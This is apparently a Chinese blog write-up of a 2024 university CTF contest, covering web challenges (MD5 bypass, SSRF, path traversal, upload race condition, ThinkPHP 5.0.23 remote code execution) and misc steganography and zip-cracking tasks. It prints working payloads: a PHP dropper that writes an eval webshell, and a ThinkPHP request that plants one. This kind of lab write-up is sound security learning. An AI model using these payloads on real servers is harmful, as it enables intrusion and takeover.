云曦2024秋季开学考复现(部分)

ezezssrf

第一层是一个md5的弱比较,可以用数组绕过

看到已经绕过

第二层这里有string,所以不能用数组绕过,可以通过一组不同字符但是翻译过来相同的绕过

eg.TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak与TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak

来到下一层

这里的意思是这个传参不能排在第一位,不然会=0,直接在后面传就可以了

可以看到绕过了

第四层是一个ssrf漏洞,可以通过@绕过

也成功绕过

最后这里是rce无回显,可以用tee命令先传到一个文件里再直接访问文件

得到flag

小小py

打开可以看到拥有的钱不够买flag

查看源码没发现什么,随便点击一个图片发现能够下载

bp抓包可以发现图片下载路径,然后利用目录穿越查看/etc/passwd发现成功回显

补充:

目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。

在Windows操作系统上, ../ 和 ..\ 都是返回上一级的语句。

目录穿越/遍历漏洞 -- 学习笔记_目录遍历漏洞描述-CSDN博客

发现可以成功回显,接下来查看当前进程运行的环境变量/proc/self/environ

得到flag

你能跟上我的speed吗

打开是文件上传,先随便传个马看看

联想到文件上传的条件竞争

上传文件写入一句话木马:

<?php $op=fopen("shell.php","a+");fwrite($op,'<?php @eval($_POST[cmd]);?>');fclose($op);echo(333) ?>

再次上传时用bp抓包

发送到爆破模块后,不用设置参数,然后选null payloads和无限循环抓包

接下来抓包上传文件地址,也是像上面一样设置

然后两个一起爆破,当文件上传页面爆破到333时停止

发送到重放器,改为shell.php

蚁剑连接测试成功

得到flag

学习高数

打开就一个这种界面,先拿御剑扫描一下

根据扫描结果和提示来看应该是需要爆破出正确界面

抓包并设置爆破数值

根据长度查看界面,找出不一样的那一个

访问cvFXZohgjf.php

打开看到第二个界面,这里是GET传参GS限制了payload长度,并且过滤了很多字符,后面只知道可以用异或具体用法不清楚,看了wp

得到flag,这题环境的动态flag有问题,最后就是这种

真正的hacker!

打开后看到thinkphp,发现只是5.0,传参

得到具体版本v5.0.23,然后去搜索这个版本有什么漏洞

发现是远程命令执行,可以参考这篇博客

Thinkphp5.0.23远程代码执行漏洞复现_thinkphp v5.0.23-CSDN博客

得到当前路径下的目录

查看当前路径下所有文件,发现又uploads文件,尝试写入一个php木马,访问这个页面

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php eval($_POST[cmd]); ?>' > var/www/public/uploads/shell.php

连不上,应该存在过滤,尝试换用base64的方法

然后蚁剑连接

在文件中找到两个flag

misc大杂烩

打开可以知道flag又六个考点拼接而来,第一个是一张图片

用水印工具打开后可得到第一部分的flag

flag1{hdy12-

第二段是一个word文档,隐藏文字

全选,在字体中取消勾选隐藏文字

得到第二部分flag  flag2{1yhgzc5-

第三部分是一个压缩包,打开看到最前面说这是个png文件,后面又提示base64,直接转图片

得到一个二维码

草料二维码解码得到第三段flag

flag3{Ypt0a2-

考点四是一段音频,用deepsound打开

在1.txt中找到第四段flag

flag4{ghj8-

第五段是一个压缩包

发现解压需要密码

根据提示推测密码形式为197.157.xx.xx或197.157.xxx.xxx

通过掩码攻击得到解压密码,打开后获得的内容用埃特巴什码解码得到flag

flag5{7ugak-

补充:

Zip密码爆破
爆破:逐个尝试所有密码,直到遇到正确密码
字典:字典攻击的效率比爆破稍高,因为字典中存储了常用的密码,因此就避免了爆破时把时间浪费在无用的密码上。
掩码攻击:如果已知密码的某几位,如已知8位密码的第4位是Z,那么可以构造xxxxzxxxx进行掩码攻击,掩码攻击的原理相当于构造了第4位为Z的字典,攻击效率也比逐个尝试的爆破方式高。

第六段

用010打开,看出来是一个16进制颠倒,使用python脚本倒转

然后修改后缀为zip,解压后得到第六段flag

flag6: 78uiag}

最后拼起来就是Yunxi{hdy12-1yhgzc5-Ypt0a2-ghj8-7ugak-78uiag}

MISC1

发现很规律,查看一下

最后一个字符拼起来刚好是flag,接下来只要拼完就可以了

最后是flag{7823yed-3892hu-7euiwb-euwidbh82-7ueidw}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值